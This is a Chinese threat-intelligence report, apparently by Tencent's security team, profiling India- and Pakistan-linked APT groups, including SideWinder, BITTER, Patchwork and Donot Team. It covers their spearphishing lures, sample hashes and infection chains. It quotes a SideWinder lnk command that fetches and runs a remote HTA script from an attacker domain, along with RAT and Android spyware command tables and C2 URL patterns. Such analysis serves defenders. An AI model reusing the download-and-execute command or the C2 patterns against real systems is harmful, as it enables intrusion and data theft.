一、背景

印度和巴基斯坦同属于南亚地区的两个国家,但是由于一些历史原因,两国关系一直不大和睦,冲突不断。从2019年初开始,双方关系突然紧张,冲突升级。今年2月,印度空军飞越克什米尔巴方实控线,被巴军方击落并俘获一名印度空军飞行员,同时这也是印度首次袭击巴基斯坦境内。两国在克什米尔印军队集结并且频繁交火,印方甚至水淹巴基斯坦,打开阿尔奇大坝,造成巴基斯坦面临洪水的危机,同时印方几日前公开宣称,可能会先对巴基斯坦使用核武措施。

随着双方的军事冲突愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事件后,腾讯安全御见威胁情报中心曾捕获并发布了一例以此次冲突事件为诱饵的APT攻击样本,分析后确认了该样本源于巴基斯坦的APT攻击组织TransparentTribe(见参考文章1),此外印度针对巴基斯坦的攻击活动也一直在持续中,腾讯安全御见威胁情报中心也曾多次发布相关的分析报告(见参考文章2、3)

网络战被认为是地缘政治的延伸,甚至是战争和冲突的一部分。APT攻击做为网络战中的重要攻击活动,其活跃趋势跟地缘政治等全球热点问题密切相关,全球APT攻击高发区域也是全球地缘政治冲突的敏感地域。纵观2019年活跃的网络攻击活动,无一不是政治局势复杂和敏感的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈甚至是现代战争的重要组成部分。

回到印巴冲突中,腾讯安全御见情报威胁中心捕获到大量关于印巴网络攻击的恶意样本。经过深度分析和跟踪溯源,我们归类出较为活跃的几个APT组织,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。同时在分析溯源的过程中,我们还发现APT组织之间相互伪装,试图来混淆安全人员分析,躲避追踪。本文为对该些活动和组织的一些总结,可能会存在一定的疏漏,还请业内同行再作补充。

二、疑似来自印度的攻击

印方在对巴基斯坦的网络攻击活动中,一直处于强势和主导的地步,还涉及到跟印度相关的APT攻击组织也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。

1、SideWinder(响尾蛇)

组织概况

SideWinder(响尾蛇)是腾讯安全御见情报威胁中心最早在2018年披露的APT攻击组织,得名由来为该组织的背景跟卡巴斯基在2018年第一季度报告中提到的SideWinder组织非常的相似,虽然卡巴斯基并未发布任何该组织的技术细节和报告。即便如此,我们还是继续沿用卡巴斯基的命名,命名该组织为"响尾蛇"。

该组织的最早的攻击活动可以追溯到 2012 年。在2019年2月,腾讯安全御见情报威胁中心再次详细的披露过该组织在2018年下半年的一些攻击活动。此外,国内有多个安全公司也同时披露过该组织的其他的一些攻击活动。

攻击目标

主要为巴基斯坦政府部门(如内阁部门)、巴基斯坦军方、军事目标等

技术手段

SideWinder(响尾蛇)主要采用鱼叉攻击的方式,投递带有漏洞的office文档或者包含恶意lnk的压缩包文件,受害者打开office文档或者恶意lnk文件后会下载执行hta文件,通过执行hta脚本进一步下载后门RAT。

如某次攻击的钓鱼邮件:

如某次攻击的诱饵:

诱饵名

诱饵hash

上传日期

诱饵类型

PassportchangeProfession.zip

050dd090b5af80fb73b2d6e6c8a3adc9

2019-07-15 14:37:20

ZIP

压缩包解压后为一个恶意的lnk文件:

执行命令:

%windir%\system32\mshtb.exe http://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d

执行的脚本后,除了收集本地杀软信息外,还会解密诱饵pdf文件内容并且打开,随着继续下载下一阶段的hta脚本。

打开的诱饵pdf内容为:

hta脚本为最终会使用一个白加黑技术,来执行最终的后门文件SystemApp.dll,该后门用来进行信息的收集,包括系统信息、文件信息等。

白加黑文件:

后门内容:

此外,其他的攻击中,该组织还会使用VB的RAT,如:

组织小节

项目类型

内容

组织名称

响尾蛇(SideWinder、T-APT-04)

攻击目标

政府部门、军方、军事目标

攻击国家

巴基斯坦

攻击目的

窃取敏感资料、信息等

攻击时间

从2012年持续至今

曝光时间

最早在2018年5月被腾讯御见威胁情报中心曝光

攻击方式

鱼叉攻击->hta->白+黑(Rat)

诱饵类型

Doc、lnk等

编程语言

VB、js、vbs、powershell、C#等

攻击平台

Windows、Android等

攻击者

疑似来自印度

2、BITTER(蔓灵花) & Patchwork(白象)& White Company & Confucius(孔子)

组织概况

之所以把这几个组织放在一起,是因为我们相信,该四个组织之间都存在一定的关联,甚至为同一组织或同一组织分化出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),我们不止一次的在我们的分析报告中指出存在包括武器库、基础设施等的共用的证据,如《蔓灵花(BITTER)APT组织针对中国境内政府、军工、核能等敏感机构的最新攻击活动报告》等。

其中,蔓灵花最早在2016由美国安全公司Forcepoint进行了披露,并且命名为“BITTER”,得名由来为早期的特马的数据包中都包含字符“BITTER”做为标识,因此得名。同年国内友商360也跟进发布了分析报告,命名为“蔓灵花”。当然该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。

白象组织,也叫摩诃草、Patchwork、HangOver,该最早可以追溯到2009年11月,至今还非常活跃。同样该组织除了针对巴基斯坦进行攻击外,也在频繁的针对中国大陆的目标进行攻击活动。

White Company为2018年由cylance公司披露的APT组织,虽然该公司的报告中未明确指出该组织的背景,但是从我们的分析发现,该组织同样来自印度,并且我们也进一步发现,该组织的武器库和白象相重叠。

Confucius(孔子)为Palo Alto Networks Unit 42在2016年发现针对南亚特定人群的威胁组织。该组织在恶意代码和基础设施上与白象和蔓灵花均存在重叠,但目标稍有不同。

攻击目标

组织

攻击目标

BITTER(蔓灵花)

政府部门(尤其是外交机构)、军工企业、核能企业等

Patchwork(白象)

政府机构、科研教育机构和研究所

White Company

政府、军方、军事目标

Confucius(孔子)

政府、司法部门、军方

技术手段

这几个组织都习惯使用鱼叉攻击的方式,投递含有漏洞或宏的office文档、带有漏洞的InPage文件、自解压文件等。

如蔓灵花的诱饵文档:

如白象的诱饵:

如Confucius(孔子)的诱饵:

而执行诱饵文档后,最终的武器库也略有不同。如蔓灵花:

蔓灵花第一阶段木马一般都为一个downloader,除了下载第二阶段的相关木马外,还会收集用户的相关信息,如上报信息:

"?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e="

上报内容包括主机名、计算机名、操作系统名、用户名等。

而第二阶段为下发相应的插件,插件内容包括添加开机启动、键盘记录、最终的远控木马等。

此外,蔓灵花还存在一些使用习惯,如文件目录习惯使用new_downloader_xxx:

而下载地址习惯使用healthne:

序号

插件下载地址

插件功能

1

http://C&C地址/healthne/healthne/regdl

添加开机启动

2

http://C&C地址/healthne/healthne/igfxsrvk

键盘记录

3

http://C&C地址/healthne/healthne/spoolvs

最终的远控木马

如白象:

今年最常使用的特马为名为badnews的特马,使用github和feed43等公用平台用来分发C&C:

特马功能

命令号

功能

0

退出木马进程,结束控制

8

获取键盘记录:上传TPX498.dat,即键盘记录文件

23

获取截屏:截屏并存储为TPX499.dat,并上传

13

上传文件:读取指定文件内容写入到AdbFle.tmp,并上传

4

获取文档文件目录列表:上传edg499.dat并删除,再运行一次木马自身

5

上传指定路劲的文件

33

下载文件:从指定URL下载文件,并执行

组织关系

我们之前的文章已经多次指出了BITTER、白象、Confucius之间的关系,本文着重描述下白象跟White Company之间的关系。

如我们从确定白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发现了样本中包含了提权漏洞CVE-2016-7255的模块:

把该模块dump下来后,根据模块的特征我们进行搜索,发现了某篇文章中:

跟文章中的代码完全相似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan):

而我们对该漏洞的所有公开利用的代码经过搜寻,以及对该模块的特征进行搜索,均未在其他的攻击活动中发现跟该模块匹配的利用代码和代码结构,因此我们判断该特权利用模块为该组织特有,而该文章曝光的活动的组织跟白象为同一个或者能通用武器库的攻击小组。

而继续对该文章中披露的组织进行研究,我们发现该攻击组织就位cylance曝光的White Company:

组织小节

3、Donot Team

组织概况

Donot Team是2018年被曝光的APT攻击组织,最早在2018年3月由NetScout公司的ASERT团队进行了披露,随后国内的厂商奇安信也进行了披露。

该组织的得来自某攻击文件中的pdb中含有donot目录(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio 2010\Projects\downloader\Debug\downloader.pdb),因此取名为Donot Team,国内的安全厂商奇安信通过音译命名为肚脑虫,我们继续沿用该命名。该组织主要针对巴基斯坦进行攻击活动。

攻击目标

巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等

技术手段

Donot Team通常会投递带有恶意宏的office文档文件,文档名和文档内容都具有很强的针对性。

如使用巴基斯坦空军的诱饵:

如伪装巴基斯坦国家银行Excel计算器:

当受害者打开office恶意样本后,会提示执行宏代码,点击执行后会释放包含脚本和后门程序的压缩包,然后解压执行脚本,脚本最终会启动后门木马。

相关宏代码:

释放的压缩包:

执行脚本代码:

最终执行的恶意文件,会根据返回的Content-Typel来进行下一步行为:

1)当返回的为application时则会将返回的包解码exe后存储到 %userprofile%\\DriveData\\Files\\目录下。

2)当返回的是cmdline时,则会执行%userprofile%\\DriveData\\Files\\wuaupdt.exe

3)当返回的是batcmd的时,则会执行%userprofile%\\DriveData\\Files\\test.bat

4)除了windows上的攻击外,Donot Team还拥有移动端的攻击能力。如使用安卓特马StealJob的攻击流程(来源奇安信博客分析,见参考文章4):

相关功能

控制指令

指令含义

live_recording_scheduling_job

进行录音控制

tag_network_info_job

获取网络状态并上传

tag_directory_trees_job

获取手机文件目录并上传

tag_live_recordings_job

录音并上传录音文件

tag_key_logs_job

获取密钥日志并上传

tag_user_profile_job

获取通讯录并上传

tag_location_job

获取地理位置并上传

tag_apps_info_job

获取手机已安装应用并上传

test_job

测试

tag_sms_job

获取用户手机短信并上传

tag_calls_logs_job

获取用户手机通讯录并上传

tag_control_info_retrieval_job

检索控制信息

tag_notifications_job

获取通知并上传

tag_location_sender_job

获取位置并上传

tag_files_sending_job

上传文件

polling_job

对程序本身功能进行监控,并做出相应的操作

tag_contacts_job

获取手机IMEI并上传

tag_call_recordings_job

获取通话录音并上传

tag_device_info_job

获取手机固件信息并上传

tag_key_exchange_job

密钥交换

组织小节

项目类型

内容

组织名称

肚脑虫(Donot Team)

攻击目标

巴基斯坦政府部门、巴基斯坦军方、金融机构、外贸人士等

攻击国家

巴基斯坦

攻击目的

窃取敏感资料、信息等

攻击时间

从2017年持续至今

曝光时间

最早在2018年3月由NetScout公司的ASERT团队进行了披露

攻击方式

鱼叉攻击->Zip->RAT

诱饵类型

Office、Apk等

编程语言

VB、C++、java等

攻击平台

Windows、Android等

攻击者

疑似来自印度

三、疑似来自巴基斯坦的攻击

巴方在对印度的网络攻击活动中,一直处于弱势和挨打的地位,目前发现的相关的APT攻击组织也相对较少,较有代表性的是TransparentTribe

组织概况

TransparentTribe APT组织,又称ProjectM、C-Major,该组织的活动最早可以追溯到2012年。该组织的相关活动在2016年3月被proofpoint披露,趋势科技随后也跟进进行了相关活动的披露。

腾讯安全御见威胁情报中心曾在上半年曝光过该组织的相关攻击活动《TransparentTribe APT组织2019年针对印度政府、军事目标的攻击活动报告》。

攻击目标

印度政府、印度军方、军事研究机构等。

技术手段

TransparentTribe通常投递带有恶意宏的office文档,诱饵文档内容多与政府、军事相关,当受害者打开恶意文档后,会提示执行宏代码,一般点击执行后诱饵内容才会显示出来。

如跟印度陆战研究中心(CLAWS)相关诱饵:

如跟印度国防学院(NDC)相关诱饵:

宏代码执行后会释放一个压缩包文件,并解压出包含的木马后门执行:

在后门使用上,该组织依旧使用CrimsonRAT、.net loader、.net droper、PeppyRAT 相关特马:

而经过腾讯安全御见威胁情报中心的数据溯源,该组织疑似跟巴基斯坦另外一个组织Gorgon Group有一定的关联:

<